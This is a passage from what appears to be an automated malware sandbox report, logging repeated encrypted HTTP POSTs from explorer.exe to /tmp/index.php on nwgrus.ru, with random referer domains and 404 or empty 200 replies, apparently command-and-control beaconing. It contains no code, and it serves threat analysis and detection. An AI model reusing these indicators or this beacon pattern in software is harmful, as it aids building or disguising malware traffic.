                                        Oct 7, 2024 14:59:34.116729021 CEST326OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 44 41 f1 a4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuDA]\Yz|>)3p]#wEQ6,leR1pdPih;GZ2TvkN6;?sqCVz`d1jir!+
                                        Oct 7, 2024 14:59:35.044061899 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:34 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.549850105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:35.054987907 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ncglteyuwoqfog.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 305
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:35.055008888 CEST305OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7b 24 c3 f1
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu{$lQ]wl1S9*(2K?FJL#@-J4z7\(mk~=!NI$pMM1mqbili1*A
                                        Oct 7, 2024 14:59:35.979567051 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:35 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.549856105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:36.406860113 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://uknyifxswcdyll.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 123
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:36.406965017 CEST123OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 55 45 dc e4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuUEJ-}QoiQQtOb^)
                                        Oct 7, 2024 14:59:37.312268972 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:37 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.549867105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:37.321669102 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://pxdktwwwgewqlyba.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 247
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:37.321669102 CEST247OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4e 5d d4 af
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuN]lDY]JCfz}am>c;GC#C7!Si_J+<~~dB{!(_z*S=LvlgYRt?X7_jdc
                                        Oct 7, 2024 14:59:38.356266975 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:38 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.549868105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:38.365433931 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://emasrygonyft.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 356
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:38.365433931 CEST356OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 7d 05 ba a0
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu}USgyI"|iH"emr[I{`>Q.?]XH-L?KuaB<EA<~Rc"=!u-qZ)Z|9Y7
                                        Oct 7, 2024 14:59:39.268884897 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:39 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.549874105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:39.307909012 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://pwvfxidmiqrrd.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 219
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:39.307909012 CEST219OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 71 58 ac 8e
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuqX_|eZ$P^[lt~G{j(C80&Ul\C'@6)YNlTG;*\""2w
                                        Oct 7, 2024 14:59:40.231791973 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:40 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.549885105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:40.240510941 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://gcmljhlsnyknod.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 256
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:40.240534067 CEST256OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 6e 26 b2 f8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vun&tGa|@@k1yLW/`D,[`=@,krcY;t6]W&'iEx[RI|ack*AGW4
                                        Oct 7, 2024 14:59:41.191051006 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:41 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.549891105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:41.210547924 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://emsfvchaaieje.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 120
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:41.210547924 CEST120OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 7c 34 bd 8b
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu|4MMO(ZS#QlVtw
                                        Oct 7, 2024 14:59:42.137079000 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:41 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.549897105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:42.146612883 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://goboxcgfexx.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 175
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:42.146632910 CEST175OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 5b 40 b1 f7
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu[@}omjJnl#&Rg/+(\"Xh.2!a2pY)]
                                        Oct 7, 2024 14:59:43.084280968 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:42 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.549903105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:43.094247103 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ruprlmkhoul.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 200
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:43.094276905 CEST200OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 52 1d e0 ea
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuRvx=D(X-qoWC(m>NIY+]DYXyE+:Xv:8ihJI
                                        Oct 7, 2024 14:59:44.027868032 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:43 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.549910105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:44.037916899 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://isbmdtufnkfjsgc.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 342
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:44.037940025 CEST342OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5b 1a d4 f1
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu[5C~`nW3oabe'"?tQV\{7vrsW'ZD@6U C$en!dx)w[W?YPMj
                                        Oct 7, 2024 14:59:44.971501112 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
